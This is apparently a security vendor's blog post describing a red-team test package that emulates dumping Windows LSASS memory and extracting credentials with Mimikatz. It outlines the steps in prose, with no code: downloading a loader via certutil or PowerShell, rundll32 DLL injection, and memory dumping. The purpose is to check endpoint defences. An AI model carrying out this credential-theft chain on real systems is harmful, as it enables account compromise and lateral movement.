• John Lundgren

Attack on Demand: Credential Access using LSASS

Updated: May 24

This article provides a demonstration and context for the Credential Access using LSASS Attack on Demand packages that are a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module.


Background


When an attacker first gains access to a host, one of their early goals is to seize as many credentials as possible. This increases the likelihood that they will have the permissions needed to maneuver through the compromised network and achieve their objective - usually stealing or encrypting your valuable data.


On a Microsoft Windows host, one of the most common tactics that an attacker will use to seize credentials is to dump the process memory of the Local Security Authority Subsystem Service (LSASS), which Windows uses to store credentials and protected data that the operating system needs. With the output of the LSASS memory, the attacker can use a tool like Mimikatz to extract important credentials the attacker can use to advance their attack.


Scenario


An attacker has gained initial Administrator access to the host you're testing, and now needs to collect credentials that will allow them to maneuver to additional hosts or shared resources in your network, in order to gain access to the data they are seeking to steal or ransom.


Technical Requirements

  • Microsoft Windows 10 Host

  • Administrator Privileges


Attack Package Descriptions


Currently, there are two available options available to test your security against this tactic - Credential Access using LSASS and Credential Access Using LSASS and Mimikatz. The steps taken gain execution and dump LSASS memory are identical in both. For the option with Mimikatz, the test will attempt to extract the credentials from the dumped LSASS memory on the host being targeted.


Advanced attackers are more likely to exfiltrate the dumped LSASS memory and use Mimikatz or other tools to extract credentials, since Mimikatz is a well-known and commonly-detected attack tool by security solutions and increases the chances that the attack will be disrupted.


Attack Package Steps


Once the execution script is run as Administrator, the following actions will occur:

  1. Internet connectivity will be tested by attempting to ping www.breachbits.com

  2. The BreachBits BlueShadow loader will be downloaded from the BreachBits attack infrastructure using one of the following native Windows utilities:

  3. Curl (only available in recent Windows 10 releases)

  4. Powershell

  5. Certutil

  6. Windows utility Rundll32.exe will be used to inject the BlueShadow Dynamic Link Library (DLL) into memory.

  7. Read more about this common execution and defense evasion tactic here: https://attack.mitre.org/techniques/T1218/011/

  8. BlueShadow will download the payload needed to dump LSASS memory (and Mimikatz for the option with Mimikatz)

  9. BlueShadow will attempt to dump the LSASS memory and write it to a file on the Desktop. This file stays on the host being tested.

  10. (Mimikatz Package Only) BlueShadow will use Mimikatz to extract credentials and hashes from the LSASS memory file. This file stays on the host being tested.


Results and Next Steps


The best (and most secure) result of tests using these Attack on Demand packages is your security solution stopping BlueShadow from dumping LSASS memory at all. While dumping the memory of a process is not malicious by itself, the fact that the memory of such a sensitive process is being dumped, along with the sheer volume of memory that is dumped should trigger your endpoint security solution to detect (and ideally stop) this behavior, keeping your credentials secure from attackers attempting this tactic to expand their access move laterally through your network.


If your endpoint security solution allowed the dumping of LSASS memory, we recommend reviewing any documentation related to your endpoint security solution to identify any configuration changes that may be made to increase the sensitivity of your solution, in order to stop an attacker from using this tactic successfully to gain access to your sensitive credentials.






11 views0 comments

Recent Posts

See All

Attack on Demand: Darkside Group Ransomware Emulation

This guide provides a demonstration and details of the Darkside Group Ransomware Emulation that is a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module. Background In May 2021, a

Attack on Demand: BreachBits Ransomware Emulation

This guide provides a demonstration and details of the BreachBits Ransomware Emulation that is a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module. Background Ransomware attacks